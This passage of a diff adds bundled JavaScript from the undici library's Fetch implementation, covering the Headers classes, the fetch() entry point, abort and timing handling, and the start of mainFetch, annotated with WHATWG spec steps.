} = __nccwpck_require__(1744) +const assert = __nccwpck_require__(9491) + +const kHeadersMap = Symbol('headers map') +const kHeadersSortedMap = Symbol('headers map sorted') + +/** + * @param {number} code + */ +function isHTTPWhiteSpaceCharCode (code) { + return code === 0x00a || code === 0x00d || code === 0x009 || code === 0x020 +} + +/** + * @see https://fetch.spec.whatwg.org/#concept-header-value-normalize + * @param {string} potentialValue + */ +function headerValueNormalize (potentialValue) { + // To normalize a byte sequence potentialValue, remove + // any leading and trailing HTTP whitespace bytes from + // potentialValue. + let i = 0; let j = potentialValue.length + + while (j > i && isHTTPWhiteSpaceCharCode(potentialValue.charCodeAt(j - 1))) --j + while (j > i && isHTTPWhiteSpaceCharCode(potentialValue.charCodeAt(i))) ++i + + return i === 0 && j === potentialValue.length ? potentialValue : potentialValue.substring(i, j) +} + +function fill (headers, object) { + // To fill a Headers object headers with a given object object, run these steps: + + // 1. If object is a sequence, then for each header in object: + // Note: webidl conversion to array has already been done. + if (Array.isArray(object)) { + for (let i = 0; i < object.length; ++i) { + const header = object[i] + // 1. If header does not contain exactly two items, then throw a TypeError. + if (header.length !== 2) { + throw webidl.errors.exception({ + header: 'Headers constructor', + message: `expected name/value pair to be length 2, found ${header.length}.` + }) + } + + // 2. Append (header’s first item, header’s second item) to headers. + appendHeader(headers, header[0], header[1]) + } + } else if (typeof object === 'object' && object !== null) { + // Note: null should throw + + // 2. Otherwise, object is a record, then for each key → value in object, + // append (key, value) to headers + const keys = Object.keys(object) + for (let i = 0; i < keys.length; ++i) { + appendHeader(headers, keys[i], object[keys[i]]) + } + } else { + throw webidl.errors.conversionFailed({ + prefix: 'Headers constructor', + argument: 'Argument 1', + types: ['sequence>', 'record'] + }) + } +} + +/** + * @see https://fetch.spec.whatwg.org/#concept-headers-append + */ +function appendHeader (headers, name, value) { + // 1. Normalize value. + value = headerValueNormalize(value) + + // 2. If name is not a header name or value is not a + // header value, then throw a TypeError. + if (!isValidHeaderName(name)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.append', + value: name, + type: 'header name' + }) + } else if (!isValidHeaderValue(value)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.append', + value, + type: 'header value' + }) + } + + // 3. If headers’s guard is "immutable", then throw a TypeError. + // 4. Otherwise, if headers’s guard is "request" and name is a + // forbidden header name, return. + // Note: undici does not implement forbidden header names + if (headers[kGuard] === 'immutable') { + throw new TypeError('immutable') + } else if (headers[kGuard] === 'request-no-cors') { + // 5. Otherwise, if headers’s guard is "request-no-cors": + // TODO + } + + // 6. Otherwise, if headers’s guard is "response" and name is a + // forbidden response-header name, return. + + // 7. Append (name, value) to headers’s header list. + return headers[kHeadersList].append(name, value) + + // 8. If headers’s guard is "request-no-cors", then remove + // privileged no-CORS request headers from headers +} + +class HeadersList { + /** @type {[string, string][]|null} */ + cookies = null + + constructor (init) { + if (init instanceof HeadersList) { + this[kHeadersMap] = new Map(init[kHeadersMap]) + this[kHeadersSortedMap] = init[kHeadersSortedMap] + this.cookies = init.cookies === null ? null : [...init.cookies] + } else { + this[kHeadersMap] = new Map(init) + this[kHeadersSortedMap] = null + } + } + + // https://fetch.spec.whatwg.org/#header-list-contains + contains (name) { + // A header list list contains a header name name if list + // contains a header whose name is a byte-case-insensitive + // match for name. + name = name.toLowerCase() + + return this[kHeadersMap].has(name) + } + + clear () { + this[kHeadersMap].clear() + this[kHeadersSortedMap] = null + this.cookies = null + } + + // https://fetch.spec.whatwg.org/#concept-header-list-append + append (name, value) { + this[kHeadersSortedMap] = null + + // 1. If list contains name, then set name to the first such + // header’s name. + const lowercaseName = name.toLowerCase() + const exists = this[kHeadersMap].get(lowercaseName) + + // 2. Append (name, value) to list. + if (exists) { + const delimiter = lowercaseName === 'cookie' ? '; ' : ', ' + this[kHeadersMap].set(lowercaseName, { + name: exists.name, + value: `${exists.value}${delimiter}${value}` + }) + } else { + this[kHeadersMap].set(lowercaseName, { name, value }) + } + + if (lowercaseName === 'set-cookie') { + this.cookies ??= [] + this.cookies.push(value) + } + } + + // https://fetch.spec.whatwg.org/#concept-header-list-set + set (name, value) { + this[kHeadersSortedMap] = null + const lowercaseName = name.toLowerCase() + + if (lowercaseName === 'set-cookie') { + this.cookies = [value] + } + + // 1. If list contains name, then set the value of + // the first such header to value and remove the + // others. + // 2. Otherwise, append header (name, value) to list. + this[kHeadersMap].set(lowercaseName, { name, value }) + } + + // https://fetch.spec.whatwg.org/#concept-header-list-delete + delete (name) { + this[kHeadersSortedMap] = null + + name = name.toLowerCase() + + if (name === 'set-cookie') { + this.cookies = null + } + + this[kHeadersMap].delete(name) + } + + // https://fetch.spec.whatwg.org/#concept-header-list-get + get (name) { + const value = this[kHeadersMap].get(name.toLowerCase()) + + // 1. If list does not contain name, then return null. + // 2. Return the values of all headers in list whose name + // is a byte-case-insensitive match for name, + // separated from each other by 0x2C 0x20, in order. + return value === undefined ? null : value.value + } + + * [Symbol.iterator] () { + // use the lowercased name + for (const [name, { value }] of this[kHeadersMap]) { + yield [name, value] + } + } + + get entries () { + const headers = {} + + if (this[kHeadersMap].size) { + for (const { name, value } of this[kHeadersMap].values()) { + headers[name] = value + } + } + + return headers + } +} + +// https://fetch.spec.whatwg.org/#headers-class +class Headers { + constructor (init = undefined) { + if (init === kConstruct) { + return + } + this[kHeadersList] = new HeadersList() + + // The new Headers(init) constructor steps are: + + // 1. Set this’s guard to "none". + this[kGuard] = 'none' + + // 2. If init is given, then fill this with init. + if (init !== undefined) { + init = webidl.converters.HeadersInit(init) + fill(this, init) + } + } + + // https://fetch.spec.whatwg.org/#dom-headers-append + append (name, value) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 2, { header: 'Headers.append' }) + + name = webidl.converters.ByteString(name) + value = webidl.converters.ByteString(value) + + return appendHeader(this, name, value) + } + + // https://fetch.spec.whatwg.org/#dom-headers-delete + delete (name) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.delete' }) + + name = webidl.converters.ByteString(name) + + // 1. If name is not a header name, then throw a TypeError. + if (!isValidHeaderName(name)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.delete', + value: name, + type: 'header name' + }) + } + + // 2. If this’s guard is "immutable", then throw a TypeError. + // 3. Otherwise, if this’s guard is "request" and name is a + // forbidden header name, return. + // 4. Otherwise, if this’s guard is "request-no-cors", name + // is not a no-CORS-safelisted request-header name, and + // name is not a privileged no-CORS request-header name, + // return. + // 5. Otherwise, if this’s guard is "response" and name is + // a forbidden response-header name, return. + // Note: undici does not implement forbidden header names + if (this[kGuard] === 'immutable') { + throw new TypeError('immutable') + } else if (this[kGuard] === 'request-no-cors') { + // TODO + } + + // 6. If this’s header list does not contain name, then + // return. + if (!this[kHeadersList].contains(name)) { + return + } + + // 7. Delete name from this’s header list. + // 8. If this’s guard is "request-no-cors", then remove + // privileged no-CORS request headers from this. + this[kHeadersList].delete(name) + } + + // https://fetch.spec.whatwg.org/#dom-headers-get + get (name) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.get' }) + + name = webidl.converters.ByteString(name) + + // 1. If name is not a header name, then throw a TypeError. + if (!isValidHeaderName(name)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.get', + value: name, + type: 'header name' + }) + } + + // 2. Return the result of getting name from this’s header + // list. + return this[kHeadersList].get(name) + } + + // https://fetch.spec.whatwg.org/#dom-headers-has + has (name) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.has' }) + + name = webidl.converters.ByteString(name) + + // 1. If name is not a header name, then throw a TypeError. + if (!isValidHeaderName(name)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.has', + value: name, + type: 'header name' + }) + } + + // 2. Return true if this’s header list contains name; + // otherwise false. + return this[kHeadersList].contains(name) + } + + // https://fetch.spec.whatwg.org/#dom-headers-set + set (name, value) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 2, { header: 'Headers.set' }) + + name = webidl.converters.ByteString(name) + value = webidl.converters.ByteString(value) + + // 1. Normalize value. + value = headerValueNormalize(value) + + // 2. If name is not a header name or value is not a + // header value, then throw a TypeError. + if (!isValidHeaderName(name)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.set', + value: name, + type: 'header name' + }) + } else if (!isValidHeaderValue(value)) { + throw webidl.errors.invalidArgument({ + prefix: 'Headers.set', + value, + type: 'header value' + }) + } + + // 3. If this’s guard is "immutable", then throw a TypeError. + // 4. Otherwise, if this’s guard is "request" and name is a + // forbidden header name, return. + // 5. Otherwise, if this’s guard is "request-no-cors" and + // name/value is not a no-CORS-safelisted request-header, + // return. + // 6. Otherwise, if this’s guard is "response" and name is a + // forbidden response-header name, return. + // Note: undici does not implement forbidden header names + if (this[kGuard] === 'immutable') { + throw new TypeError('immutable') + } else if (this[kGuard] === 'request-no-cors') { + // TODO + } + + // 7. Set (name, value) in this’s header list. + // 8. If this’s guard is "request-no-cors", then remove + // privileged no-CORS request headers from this + this[kHeadersList].set(name, value) + } + + // https://fetch.spec.whatwg.org/#dom-headers-getsetcookie + getSetCookie () { + webidl.brandCheck(this, Headers) + + // 1. If this’s header list does not contain `Set-Cookie`, then return « ». + // 2. Return the values of all headers in this’s header list whose name is + // a byte-case-insensitive match for `Set-Cookie`, in order. + + const list = this[kHeadersList].cookies + + if (list) { + return [...list] + } + + return [] + } + + // https://fetch.spec.whatwg.org/#concept-header-list-sort-and-combine + get [kHeadersSortedMap] () { + if (this[kHeadersList][kHeadersSortedMap]) { + return this[kHeadersList][kHeadersSortedMap] + } + + // 1. Let headers be an empty list of headers with the key being the name + // and value the value. + const headers = [] + + // 2. Let names be the result of convert header names to a sorted-lowercase + // set with all the names of the headers in list. + const names = [...this[kHeadersList]].sort((a, b) => a[0] < b[0] ? -1 : 1) + const cookies = this[kHeadersList].cookies + + // 3. For each name of names: + for (let i = 0; i < names.length; ++i) { + const [name, value] = names[i] + // 1. If name is `set-cookie`, then: + if (name === 'set-cookie') { + // 1. Let values be a list of all values of headers in list whose name + // is a byte-case-insensitive match for name, in order. + + // 2. For each value of values: + // 1. Append (name, value) to headers. + for (let j = 0; j < cookies.length; ++j) { + headers.push([name, cookies[j]]) + } + } else { + // 2. Otherwise: + + // 1. Let value be the result of getting name from list. + + // 2. Assert: value is non-null. + assert(value !== null) + + // 3. Append (name, value) to headers. + headers.push([name, value]) + } + } + + this[kHeadersList][kHeadersSortedMap] = headers + + // 4. Return headers. + return headers + } + + keys () { + webidl.brandCheck(this, Headers) + + if (this[kGuard] === 'immutable') { + const value = this[kHeadersSortedMap] + return makeIterator(() => value, 'Headers', + 'key') + } + + return makeIterator( + () => [...this[kHeadersSortedMap].values()], + 'Headers', + 'key' + ) + } + + values () { + webidl.brandCheck(this, Headers) + + if (this[kGuard] === 'immutable') { + const value = this[kHeadersSortedMap] + return makeIterator(() => value, 'Headers', + 'value') + } + + return makeIterator( + () => [...this[kHeadersSortedMap].values()], + 'Headers', + 'value' + ) + } + + entries () { + webidl.brandCheck(this, Headers) + + if (this[kGuard] === 'immutable') { + const value = this[kHeadersSortedMap] + return makeIterator(() => value, 'Headers', + 'key+value') + } + + return makeIterator( + () => [...this[kHeadersSortedMap].values()], + 'Headers', + 'key+value' + ) + } + + /** + * @param {(value: string, key: string, self: Headers) => void} callbackFn + * @param {unknown} thisArg + */ + forEach (callbackFn, thisArg = globalThis) { + webidl.brandCheck(this, Headers) + + webidl.argumentLengthCheck(arguments, 1, { header: 'Headers.forEach' }) + + if (typeof callbackFn !== 'function') { + throw new TypeError( + "Failed to execute 'forEach' on 'Headers': parameter 1 is not of type 'Function'." + ) + } + + for (const [key, value] of this) { + callbackFn.apply(thisArg, [value, key, this]) + } + } + + [Symbol.for('nodejs.util.inspect.custom')] () { + webidl.brandCheck(this, Headers) + + return this[kHeadersList] + } +} + +Headers.prototype[Symbol.iterator] = Headers.prototype.entries + +Object.defineProperties(Headers.prototype, { + append: kEnumerableProperty, + delete: kEnumerableProperty, + get: kEnumerableProperty, + has: kEnumerableProperty, + set: kEnumerableProperty, + getSetCookie: kEnumerableProperty, + keys: kEnumerableProperty, + values: kEnumerableProperty, + entries: kEnumerableProperty, + forEach: kEnumerableProperty, + [Symbol.iterator]: { enumerable: false }, + [Symbol.toStringTag]: { + value: 'Headers', + configurable: true + } +}) + +webidl.converters.HeadersInit = function (V) { + if (webidl.util.Type(V) === 'Object') { + if (V[Symbol.iterator]) { + return webidl.converters['sequence>'](V) + } + + return webidl.converters['record'](V) + } + + throw webidl.errors.conversionFailed({ + prefix: 'Headers constructor', + argument: 'Argument 1', + types: ['sequence>', 'record'] + }) +} + +module.exports = { + fill, + Headers, + HeadersList +} + + +/***/ }), + +/***/ 4881: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +// https://github.com/Ethan-Arrowood/undici-fetch + + + +const { + Response, + makeNetworkError, + makeAppropriateNetworkError, + filterResponse, + makeResponse +} = __nccwpck_require__(7823) +const { Headers } = __nccwpck_require__(554) +const { Request, makeRequest } = __nccwpck_require__(8359) +const zlib = __nccwpck_require__(9796) +const { + bytesMatch, + makePolicyContainer, + clonePolicyContainer, + requestBadPort, + TAOCheck, + appendRequestOriginHeader, + responseLocationURL, + requestCurrentURL, + setRequestReferrerPolicyOnRedirect, + tryUpgradeRequestToAPotentiallyTrustworthyURL, + createOpaqueTimingInfo, + appendFetchMetadata, + corsCheck, + crossOriginResourcePolicyCheck, + determineRequestsReferrer, + coarsenedSharedCurrentTime, + createDeferredPromise, + isBlobLike, + sameOrigin, + isCancelled, + isAborted, + isErrorLike, + fullyReadBody, + readableStreamClose, + isomorphicEncode, + urlIsLocal, + urlIsHttpHttpsScheme, + urlHasHttpsScheme +} = __nccwpck_require__(2538) +const { kState, kHeaders, kGuard, kRealm } = __nccwpck_require__(5861) +const assert = __nccwpck_require__(9491) +const { safelyExtractBody } = __nccwpck_require__(1472) +const { + redirectStatusSet, + nullBodyStatus, + safeMethodsSet, + requestBodyHeader, + subresourceSet, + DOMException +} = __nccwpck_require__(1037) +const { kHeadersList } = __nccwpck_require__(2785) +const EE = __nccwpck_require__(2361) +const { Readable, pipeline } = __nccwpck_require__(2781) +const { addAbortListener, isErrored, isReadable, nodeMajor, nodeMinor } = __nccwpck_require__(3983) +const { dataURLProcessor, serializeAMimeType } = __nccwpck_require__(685) +const { TransformStream } = __nccwpck_require__(5356) +const { getGlobalDispatcher } = __nccwpck_require__(1892) +const { webidl } = __nccwpck_require__(1744) +const { STATUS_CODES } = __nccwpck_require__(3685) +const GET_OR_HEAD = ['GET', 'HEAD'] + +/** @type {import('buffer').resolveObjectURL} */ +let resolveObjectURL +let ReadableStream = globalThis.ReadableStream + +class Fetch extends EE { + constructor (dispatcher) { + super() + + this.dispatcher = dispatcher + this.connection = null + this.dump = false + this.state = 'ongoing' + // 2 terminated listeners get added per request, + // but only 1 gets removed. If there are 20 redirects, + // 21 listeners will be added. + // See https://github.com/nodejs/undici/issues/1711 + // TODO (fix): Find and fix root cause for leaked listener. + this.setMaxListeners(21) + } + + terminate (reason) { + if (this.state !== 'ongoing') { + return + } + + this.state = 'terminated' + this.connection?.destroy(reason) + this.emit('terminated', reason) + } + + // https://fetch.spec.whatwg.org/#fetch-controller-abort + abort (error) { + if (this.state !== 'ongoing') { + return + } + + // 1. Set controller’s state to "aborted". + this.state = 'aborted' + + // 2. Let fallbackError be an "AbortError" DOMException. + // 3. Set error to fallbackError if it is not given. + if (!error) { + error = new DOMException('The operation was aborted.', 'AbortError') + } + + // 4. Let serializedError be StructuredSerialize(error). + // If that threw an exception, catch it, and let + // serializedError be StructuredSerialize(fallbackError). + + // 5. Set controller’s serialized abort reason to serializedError. + this.serializedAbortReason = error + + this.connection?.destroy(error) + this.emit('terminated', error) + } +} + +// https://fetch.spec.whatwg.org/#fetch-method +function fetch (input, init = {}) { + webidl.argumentLengthCheck(arguments, 1, { header: 'globalThis.fetch' }) + + // 1. Let p be a new promise. + const p = createDeferredPromise() + + // 2. Let requestObject be the result of invoking the initial value of + // Request as constructor with input and init as arguments. If this throws + // an exception, reject p with it and return p. + let requestObject + + try { + requestObject = new Request(input, init) + } catch (e) { + p.reject(e) + return p.promise + } + + // 3. Let request be requestObject’s request. + const request = requestObject[kState] + + // 4. If requestObject’s signal’s aborted flag is set, then: + if (requestObject.signal.aborted) { + // 1. Abort the fetch() call with p, request, null, and + // requestObject’s signal’s abort reason. + abortFetch(p, request, null, requestObject.signal.reason) + + // 2. Return p. + return p.promise + } + + // 5. Let globalObject be request’s client’s global object. + const globalObject = request.client.globalObject + + // 6. If globalObject is a ServiceWorkerGlobalScope object, then set + // request’s service-workers mode to "none". + if (globalObject?.constructor?.name === 'ServiceWorkerGlobalScope') { + request.serviceWorkers = 'none' + } + + // 7. Let responseObject be null. + let responseObject = null + + // 8. Let relevantRealm be this’s relevant Realm. + const relevantRealm = null + + // 9. Let locallyAborted be false. + let locallyAborted = false + + // 10. Let controller be null. + let controller = null + + // 11. Add the following abort steps to requestObject’s signal: + addAbortListener( + requestObject.signal, + () => { + // 1. Set locallyAborted to true. + locallyAborted = true + + // 2. Assert: controller is non-null. + assert(controller != null) + + // 3. Abort controller with requestObject’s signal’s abort reason. + controller.abort(requestObject.signal.reason) + + // 4. Abort the fetch() call with p, request, responseObject, + // and requestObject’s signal’s abort reason. + abortFetch(p, request, responseObject, requestObject.signal.reason) + } + ) + + // 12. Let handleFetchDone given response response be to finalize and + // report timing with response, globalObject, and "fetch". + const handleFetchDone = (response) => + finalizeAndReportTiming(response, 'fetch') + + // 13. Set controller to the result of calling fetch given request, + // with processResponseEndOfBody set to handleFetchDone, and processResponse + // given response being these substeps: + + const processResponse = (response) => { + // 1. If locallyAborted is true, terminate these substeps. + if (locallyAborted) { + return Promise.resolve() + } + + // 2. If response’s aborted flag is set, then: + if (response.aborted) { + // 1. Let deserializedError be the result of deserialize a serialized + // abort reason given controller’s serialized abort reason and + // relevantRealm. + + // 2. Abort the fetch() call with p, request, responseObject, and + // deserializedError. + + abortFetch(p, request, responseObject, controller.serializedAbortReason) + return Promise.resolve() + } + + // 3. If response is a network error, then reject p with a TypeError + // and terminate these substeps. + if (response.type === 'error') { + p.reject( + Object.assign(new TypeError('fetch failed'), { cause: response.error }) + ) + return Promise.resolve() + } + + // 4. Set responseObject to the result of creating a Response object, + // given response, "immutable", and relevantRealm. + responseObject = new Response() + responseObject[kState] = response + responseObject[kRealm] = relevantRealm + responseObject[kHeaders][kHeadersList] = response.headersList + responseObject[kHeaders][kGuard] = 'immutable' + responseObject[kHeaders][kRealm] = relevantRealm + + // 5. Resolve p with responseObject. + p.resolve(responseObject) + } + + controller = fetching({ + request, + processResponseEndOfBody: handleFetchDone, + processResponse, + dispatcher: init.dispatcher ?? getGlobalDispatcher() // undici + }) + + // 14. Return p. + return p.promise +} + +// https://fetch.spec.whatwg.org/#finalize-and-report-timing +function finalizeAndReportTiming (response, initiatorType = 'other') { + // 1. If response is an aborted network error, then return. + if (response.type === 'error' && response.aborted) { + return + } + + // 2. If response’s URL list is null or empty, then return. + if (!response.urlList?.length) { + return + } + + // 3. Let originalURL be response’s URL list[0]. + const originalURL = response.urlList[0] + + // 4. Let timingInfo be response’s timing info. + let timingInfo = response.timingInfo + + // 5. Let cacheState be response’s cache state. + let cacheState = response.cacheState + + // 6. If originalURL’s scheme is not an HTTP(S) scheme, then return. + if (!urlIsHttpHttpsScheme(originalURL)) { + return + } + + // 7. If timingInfo is null, then return. + if (timingInfo === null) { + return + } + + // 8. If response’s timing allow passed flag is not set, then: + if (!response.timingAllowPassed) { + // 1. Set timingInfo to a the result of creating an opaque timing info for timingInfo. + timingInfo = createOpaqueTimingInfo({ + startTime: timingInfo.startTime + }) + + // 2. Set cacheState to the empty string. + cacheState = '' + } + + // 9. Set timingInfo’s end time to the coarsened shared current time + // given global’s relevant settings object’s cross-origin isolated + // capability. + // TODO: given global’s relevant settings object’s cross-origin isolated + // capability? + timingInfo.endTime = coarsenedSharedCurrentTime() + + // 10. Set response’s timing info to timingInfo. + response.timingInfo = timingInfo + + // 11. Mark resource timing for timingInfo, originalURL, initiatorType, + // global, and cacheState. + markResourceTiming( + timingInfo, + originalURL, + initiatorType, + globalThis, + cacheState + ) +} + +// https://w3c.github.io/resource-timing/#dfn-mark-resource-timing +function markResourceTiming (timingInfo, originalURL, initiatorType, globalThis, cacheState) { + if (nodeMajor > 18 || (nodeMajor === 18 && nodeMinor >= 2)) { + performance.markResourceTiming(timingInfo, originalURL.href, initiatorType, globalThis, cacheState) + } +} + +// https://fetch.spec.whatwg.org/#abort-fetch +function abortFetch (p, request, responseObject, error) { + // Note: AbortSignal.reason was added in node v17.2.0 + // which would give us an undefined error to reject with. + // Remove this once node v16 is no longer supported. + if (!error) { + error = new DOMException('The operation was aborted.', 'AbortError') + } + + // 1. Reject promise with error. + p.reject(error) + + // 2. If request’s body is not null and is readable, then cancel request’s + // body with error. + if (request.body != null && isReadable(request.body?.stream)) { + request.body.stream.cancel(error).catch((err) => { + if (err.code === 'ERR_INVALID_STATE') { + // Node bug? + return + } + throw err + }) + } + + // 3. If responseObject is null, then return. + if (responseObject == null) { + return + } + + // 4. Let response be responseObject’s response. + const response = responseObject[kState] + + // 5. If response’s body is not null and is readable, then error response’s + // body with error. + if (response.body != null && isReadable(response.body?.stream)) { + response.body.stream.cancel(error).catch((err) => { + if (err.code === 'ERR_INVALID_STATE') { + // Node bug? + return + } + throw err + }) + } +} + +// https://fetch.spec.whatwg.org/#fetching +function fetching ({ + request, + processRequestBodyChunkLength, + processRequestEndOfBody, + processResponse, + processResponseEndOfBody, + processResponseConsumeBody, + useParallelQueue = false, + dispatcher // undici +}) { + // 1. Let taskDestination be null. + let taskDestination = null + + // 2. Let crossOriginIsolatedCapability be false. + let crossOriginIsolatedCapability = false + + // 3. If request’s client is non-null, then: + if (request.client != null) { + // 1. Set taskDestination to request’s client’s global object. + taskDestination = request.client.globalObject + + // 2. Set crossOriginIsolatedCapability to request’s client’s cross-origin + // isolated capability. + crossOriginIsolatedCapability = + request.client.crossOriginIsolatedCapability + } + + // 4. If useParallelQueue is true, then set taskDestination to the result of + // starting a new parallel queue. + // TODO + + // 5. Let timingInfo be a new fetch timing info whose start time and + // post-redirect start time are the coarsened shared current time given + // crossOriginIsolatedCapability. + const currenTime = coarsenedSharedCurrentTime(crossOriginIsolatedCapability) + const timingInfo = createOpaqueTimingInfo({ + startTime: currenTime + }) + + // 6. Let fetchParams be a new fetch params whose + // request is request, + // timing info is timingInfo, + // process request body chunk length is processRequestBodyChunkLength, + // process request end-of-body is processRequestEndOfBody, + // process response is processResponse, + // process response consume body is processResponseConsumeBody, + // process response end-of-body is processResponseEndOfBody, + // task destination is taskDestination, + // and cross-origin isolated capability is crossOriginIsolatedCapability. + const fetchParams = { + controller: new Fetch(dispatcher), + request, + timingInfo, + processRequestBodyChunkLength, + processRequestEndOfBody, + processResponse, + processResponseConsumeBody, + processResponseEndOfBody, + taskDestination, + crossOriginIsolatedCapability + } + + // 7. If request’s body is a byte sequence, then set request’s body to + // request’s body as a body. + // NOTE: Since fetching is only called from fetch, body should already be + // extracted. + assert(!request.body || request.body.stream) + + // 8. If request’s window is "client", then set request’s window to request’s + // client, if request’s client’s global object is a Window object; otherwise + // "no-window". + if (request.window === 'client') { + // TODO: What if request.client is null? + request.window = + request.client?.globalObject?.constructor?.name === 'Window' + ? request.client + : 'no-window' + } + + // 9. If request’s origin is "client", then set request’s origin to request’s + // client’s origin. + if (request.origin === 'client') { + // TODO: What if request.client is null? + request.origin = request.client?.origin + } + + // 10. If all of the following conditions are true: + // TODO + + // 11. If request’s policy container is "client", then: + if (request.policyContainer === 'client') { + // 1. If request’s client is non-null, then set request’s policy + // container to a clone of request’s client’s policy container. [HTML] + if (request.client != null) { + request.policyContainer = clonePolicyContainer( + request.client.policyContainer + ) + } else { + // 2. Otherwise, set request’s policy container to a new policy + // container. + request.policyContainer = makePolicyContainer() + } + } + + // 12. If request’s header list does not contain `Accept`, then: + if (!request.headersList.contains('accept')) { + // 1. Let value be `*/*`. + const value = '*/*' + + // 2. A user agent should set value to the first matching statement, if + // any, switching on request’s destination: + // "document" + // "frame" + // "iframe" + // `text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8` + // "image" + // `image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5` + // "style" + // `text/css,*/*;q=0.1` + // TODO + + // 3. Append `Accept`/value to request’s header list. + request.headersList.append('accept', value) + } + + // 13. If request’s header list does not contain `Accept-Language`, then + // user agents should append `Accept-Language`/an appropriate value to + // request’s header list. + if (!request.headersList.contains('accept-language')) { + request.headersList.append('accept-language', '*') + } + + // 14. If request’s priority is null, then use request’s initiator and + // destination appropriately in setting request’s priority to a + // user-agent-defined object. + if (request.priority === null) { + // TODO + } + + // 15. If request is a subresource request, then: + if (subresourceSet.has(request.destination)) { + // TODO + } + + // 16. Run main fetch given fetchParams. + mainFetch(fetchParams) + .catch(err => { + fetchParams.controller.terminate(err) + }) + + // 17. Return fetchParam's controller + return fetchParams.controller +} + +// https://fetch.spec.whatwg.org/#concept-main-fetch +async function mainFetch (fetchParams, recursive = false) { + // 1. Let request be fetchParams’s request. + const request = fetchParams.request + + // 2. Let response be null. + let response = null + + // 3. If request’s local-URLs-only flag is set and request’s current URL is + // not local, then set response to a network error. + if (request.localURLsOnly && !urlIsLocal(requestCurrentURL(request))) { + response = makeNetworkError('local URLs only') + } + + // 4. Run report Content Security Policy violations for request. + // TODO + + // 5. Upgrade request to a potentially trustworthy URL, if appropriate. + tryUpgradeRequestToAPotentiallyTrustworthyURL(request) + + // 6. If should request be blocked due to a bad port, should fetching request + // be blocked as mixed content, or should request be blocked by Content + // Security Policy returns blocked, then set response to a network error. + if (requestBadPort(request) === 'blocked') { + response = makeNetworkError('bad port') + } + // TODO: should fetching request be blocked as mixed content? + // TODO: should request be blocked by Content Security Policy? + + // 7. If request’s referrer policy is the empty string, then set request’s + // referrer policy to request’s policy container’s referrer policy. + if (request.referrerPolicy === '') { + request.referrerPolicy = request.policyContainer.referrerPolicy + } + + // 8. If request’s referrer is not "no-referrer", then set request’s + // referrer to the result of invoking determine request’s referrer. + if (request.referrer !== 'no-referrer') { + request.referrer = determineRequestsReferrer(request) + } + + // 9. Set request’s current URL’s scheme to "https" if all of the following + // conditions are true: + // - request’s current URL’s scheme is "http" + // - request’s current URL’s host is a domain + // - Matching request’s current URL’s host per Known HSTS Host Domain Name + // Matching results in either a superdomain match with an asserted + // includeSubDomains directive or a congruent match (with or without an + // asserted includeSubDomains directive). [HSTS] + // TODO + + // 10. If recursive is false, then run the remaining steps in parallel. + // TODO + + // 11. If response is null, then set response to the result of running + // the steps corresponding to the first matching statement: + if (response === null) { + response = await (async () => { + const currentURL = requestCurrentURL(request) + + if ( + // - request’s current URL’s origin is same origin with request’s origin, + // and request’s response tainting is "basic" + (sameOrigin(currentURL, request.url) && request.responseTainting === 'basic') || + // request’s current URL’s scheme is "data" + (currentURL.protocol === 'data:') || + // - request’s mode is "navigate" or "websocket" + (request.mode === 'navigate' || request.mode === 'websocket') + ) { + // 1. Set request’s response tainting to "basic". + request.responseTainting = 'basic' + + // 2. Return the result of running scheme fetch given fetchParams. + return await schemeFetch(fetchParams) + } + + // request’s mode is "same-origin" + if (request.mode === 'same-origin') { + // 1. Return a network error. + return makeNetworkError('request mode cannot be "same-origin"') + } + + // request’s mode is "no-cors" + if (request.mode === 'no-cors') { + // 1. If request’s redirect mode is not "follow", then return a network + // error. + if (request.redirect !== 'follow') { + return makeNetworkError( + 'redirect mode cannot be "follow" for "no-cors" request' + ) + } + + // 2. Set request’s response tainting to "opaque". + request.responseTainting = 'opaque' + + // 3. Return the result of running scheme fetch given fetchParams. + return await schemeFetch(fetchParams) + } + + // request’s current URL’s scheme is not an HTTP(S) scheme + if (!urlIsHttpHttpsScheme(requestCurrentURL(request))) { + // Return a network error. + return makeNetworkError('URL scheme must be a HTTP(S) scheme') + } + + // - request’s use-CORS-preflight flag is set + // - request’s unsafe-request flag is set and either request’s method is + // not a CORS-safelisted method or CORS-unsafe request-header names with + // request’s header list is not empty + // 1. Set request’s response tainting to "cors". + // 2. Let corsWithPreflightResponse be the result of running HTTP fetch + // given fetchParams and true. + // 3. If corsWithPreflightResponse is a network error, then clear cache + // entries using request. + // 4. Return corsWithPreflightResponse. + // TODO + + // Otherwise + // 1. Set request’s response tainting to "cors". + request.responseTainting = 'cors' + + // 2. Return the result of running HTTP fetch given fetchParams. + return await httpFetch(fetchParams) + })() + } + + // 12. If recursive is true, then return response. + if (recursive) { + return response + } + + // 13. If response is not a network error and response is not a filtered + // response, then: + if (response.status !== 0 && !response.internalResponse) { + // If request’s response tainting is "cors", then: + if (request.responseTainting === 'cors') { + // 1. Let headerNames be the result of extracting header list values + // given `Access-Control-Expose-Headers` and response’s header list. + // TODO + // 2. If request’s credentials mode is not "include" and headerNames + // contains `*`, then set response’s CORS-exposed header-name list to + // all unique header names in response’s header list. + // TODO + // 3. Otherwise, if headerNames is not null or failure, then set + // response’s CORS-exposed header-name list to headerNames. + // TODO + } + + // Set response to the following filtered response with response as its + // internal response, depending on request’s response tainting: + if (request.responseTainting === 'basic') { + response = filterResponse(response, 'basic') + } else if (request.responseTainting === 'cors') { + response = filterResponse(response, 'cors') + } else if (request.responseTainting === 'opaque') { + response = filterResponse(response, 'opaque') + } else { + assert(false) + } + } + + // 14. Let internalResponse be response, if response is a network error, + // and response’s internal response otherwise. + let internalResponse = + response.status === 0 ? response : response.internalResponse + + // 15. If 